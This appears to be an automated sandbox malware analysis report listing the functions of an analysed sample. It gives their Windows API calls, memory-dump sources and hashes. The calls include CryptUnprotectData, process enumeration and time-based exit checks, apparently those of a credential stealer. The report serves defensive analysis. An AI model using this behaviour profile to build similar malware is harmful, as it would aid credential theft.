                            • Opcode ID: 2914506c5fc0f8c4d815bfc515650678e632ec982aac61df7262f16280cd0802
                            • Instruction ID: 99cbb71e3c299ed204990a8670e6ec9dd78f839c07120ed8594cbb8e12b8cd90
                            • Opcode Fuzzy Hash: 2914506c5fc0f8c4d815bfc515650678e632ec982aac61df7262f16280cd0802
                            • Instruction Fuzzy Hash: DCB208F3A0C2009FE3046E2DEC8567ABBE9EF94720F1A453DEAC487744EA7558058697
                            Function 00745005 Relevance: 7.8, Strings: 5, Instructions: 1554COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: "uq$ZvO$cFy$rnw$&w
                            • API String ID: 0-40677860
                            • Opcode ID: ddb46a355eebd0309b32c2e7930e4f91ffb7ffa9b833302d957b0e906c74886b
                            • Instruction ID: 07d0d47f2343ce296fccec9f492eea41f15595a8f93b11fc06e40f72baec9272
                            • Opcode Fuzzy Hash: ddb46a355eebd0309b32c2e7930e4f91ffb7ffa9b833302d957b0e906c74886b
                            • Instruction Fuzzy Hash: 17B2D4F39082009FE314AE29DC8567AFBE9EF94720F1A893DEAC4C7744E63558418797
                            Function 0038C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0038C871
                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0038C87C
                            • lstrcat.KERNEL32(?,003A0B46), ref: 0038C943
                            • lstrcat.KERNEL32(?,003A0B47), ref: 0038C957
                            • lstrcat.KERNEL32(?,003A0B4E), ref: 0038C978
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: c9390e0e29b6330b4b63cbd8244cae09b46a1edabf3b2c9e1ec62700b4c848e7
                            • Instruction ID: fe9466fdb3aa81d930198e6662756542708e1467587609b6b7b72e299c02e70d
                            • Opcode Fuzzy Hash: c9390e0e29b6330b4b63cbd8244cae09b46a1edabf3b2c9e1ec62700b4c848e7
                            • Instruction Fuzzy Hash: 63416E75D1421EDFDB10DFA4DD89FEEBBB8BB48308F1041A8E509A6280D7705A84DFA1
                            Function 00396920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                            Download Yara Rule
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 0039696C
                            • sscanf.NTDLL ref: 00396999
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003969B2
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 003969C0
                            • ExitProcess.KERNEL32 ref: 003969DA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$System$File$ExitProcesssscanf
                            • String ID:
                            • API String ID: 2533653975-0
                            • Opcode ID: f96e8ed0e6c41b52cbf4623ce838ea9621604ca129246919722c1beb07e5aa3c
                            • Instruction ID: 1c0d60252d1f48ffed597e5a55ad1bf9d586b779a637d7e427829fae7fb44487
                            • Opcode Fuzzy Hash: f96e8ed0e6c41b52cbf4623ce838ea9621604ca129246919722c1beb07e5aa3c
                            • Instruction Fuzzy Hash: CD21EA75D1420CAFCF05EFE4D945DEEBBB5BF48304F04852AE406A3250EB345609DBA9
                            Function 00387240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0038724D
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00387254
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00387281
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 003872A4
                            • LocalFree.KERNEL32(?), ref: 003872AE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: a78d74ef730aa6eab40973c3b3bf991248d381f490d962ce304d20c85af65c8c
                            • Instruction ID: a1473e8d7eb55f4590928e8e807310a642b398fb03e812cecbd6613e7de44a77
                            • Opcode Fuzzy Hash: a78d74ef730aa6eab40973c3b3bf991248d381f490d962ce304d20c85af65c8c
                            • Instruction Fuzzy Hash: DC011275A40308BFEB14DFE4CD4AF9D7BB8EB44704F104555FB05AB2C0D670AA049B65
                            Function 00399600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0039961E
                            • Process32First.KERNEL32(003A0ACA,00000128), ref: 00399632
                            • Process32Next.KERNEL32(003A0ACA,00000128), ref: 00399647
                            • StrCmpCA.SHLWAPI(?,00000000), ref: 0039965C
                            • CloseHandle.KERNEL32(003A0ACA), ref: 0039967A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                            • String ID:
                            • API String ID: 420147892-0
                            • Opcode ID: 072a397b65f9a142fed76b571b4c79048c16dcbfbea374d7653b1647ab724729
                            • Instruction ID: 92001967a9b51b1a9a1caa7c455302ce4578fb0f9cb137820c98b675791336ed
                            • Opcode Fuzzy Hash: 072a397b65f9a142fed76b571b4c79048c16dcbfbea374d7653b1647ab724729
                            • Instruction Fuzzy Hash: 6801E5B5A00208AFCF15DFA9CD48BEDBBF8EB58314F104189A90AA6240EB349A44DF51
                            Function 00398EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptBinaryToStringA.CRYPT32(00000000,00385184,40000001,00000000,00000000,?,00385184), ref: 00398EC0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptString
                            • String ID:
                            • API String ID: 80407269-0
                            • Opcode ID: 28782000c955892bf6cae6a2a13f734c4fb86f7b166ca9d1d1c436a700a90a5e
                            • Instruction ID: 95de1232023111142a99b249e16509b9fce0f1d2a6f817128bc6c96078243a7c
                            • Opcode Fuzzy Hash: 28782000c955892bf6cae6a2a13f734c4fb86f7b166ca9d1d1c436a700a90a5e
                            • Instruction Fuzzy Hash: 26111C70600208BFDF01CF64E884FA737A9AF8A304F109448F9158B250DB35EC41DB60
                            Function 00397A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0115E220,00000000,?,003A0E10,00000000,?,00000000,00000000), ref: 00397A63
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00397A6A
                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0115E220,00000000,?,003A0E10,00000000,?,00000000,00000000,?), ref: 00397A7D
                            • wsprintfA.USER32 ref: 00397AB7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID:
                            • API String ID: 3317088062-0
                            • Opcode ID: 89501a6fe3dcf545b4c65dae5128088ead61aceac9a78bd9397fd9336add23bd
                            • Instruction ID: 24ebf55b201d9c54e250cf6f79f54dca383ea3183c293e86d384924b73eb982f
                            • Opcode Fuzzy Hash: 89501a6fe3dcf545b4c65dae5128088ead61aceac9a78bd9397fd9336add23bd
                            • Instruction Fuzzy Hash: EF118EB1D45618EFEB208B54DC49FA9BB78FB04721F10439AE91A932C0C7745E44CF51
                            Function 00746AAE Relevance: 5.4, Strings: 3, Instructions: 1605COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ,L{U$Y)k|$qYro
                            • API String ID: 0-2192058398
                            • Opcode ID: 6f2a97e6c9e63a0affcb144632d00c63d4d6aae52cd6e300b87505ead57b9aad
                            • Instruction ID: 58f2448aab3378d3f40e36269a76d5b1e9c531684e6ba45bfdd27d91c803eb4f
                            • Opcode Fuzzy Hash: 6f2a97e6c9e63a0affcb144632d00c63d4d6aae52cd6e300b87505ead57b9aad
                            • Instruction Fuzzy Hash: 1FB217F360C2049FE308BE2DEC8567ABBE5EB94720F16493DE6C4C3744EA3598058697
                            Function 00393720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                            Download Yara Rule
                            APIs
                            • CoCreateInstance.COMBASE(0039E118,00000000,00000001,0039E108,00000000), ref: 00393758
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 003937B0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWide
                            • String ID:
                            • API String ID: 123533781-0
                            • Opcode ID: d4348127cc47563869fe6cf71ad2f40016a7bd3c94fb5c082f79461778444da6
                            • Instruction ID: e9723b560ee478019b359f7695e6412e3af28f0376ee3451d56600f8b2bc00e5
                            • Opcode Fuzzy Hash: d4348127cc47563869fe6cf71ad2f40016a7bd3c94fb5c082f79461778444da6
                            • Instruction Fuzzy Hash: E541E770A40A28AFDB24DB58CC95F9BB7B5BB48702F5041D8E609EB290D7716E85CF50
                            Function 00389B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00389B84
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00389BA3
                            • LocalFree.KERNEL32(?), ref: 00389BD3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: d42320f5b3b8ea34cd81f7dc40a2430082c964841cf9bb4fa90a02a2474113c0
                            • Instruction ID: 94be1979b62294aaa9137796579907972a170ca3106d6c5cfcd5ea42f27a58e8
                            • Opcode Fuzzy Hash: d42320f5b3b8ea34cd81f7dc40a2430082c964841cf9bb4fa90a02a2474113c0
                            • Instruction Fuzzy Hash: D211F7B8A00209EFDB05DF94D985EAEB7B5FF88304F104599E815A7350D770AE14CFA1
                            Function 0075756E Relevance: 4.1, Strings: 2, Instructions: 1602COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: /7w$]l^?
                            • API String ID: 0-2544237452
                            • Opcode ID: 3b10e71b6bbc49d2a509ce982c4166ba0be7c02b44248926698c4af61e5e28cf
                            • Instruction ID: da53b9a3f55b3252271ea464211f27eb1f764426b5dbaab979e60a3e6acf00a7
                            • Opcode Fuzzy Hash: 3b10e71b6bbc49d2a509ce982c4166ba0be7c02b44248926698c4af61e5e28cf
                            • Instruction Fuzzy Hash: AAB21AF3A0C2049FE304AE29DC8567AFBE9EF94720F16893DE6C5C3744E63598058697
                            Function 0074D499 Relevance: 4.0, Strings: 2, Instructions: 1538COMMON
                            Download Yara Rule
                            Strings
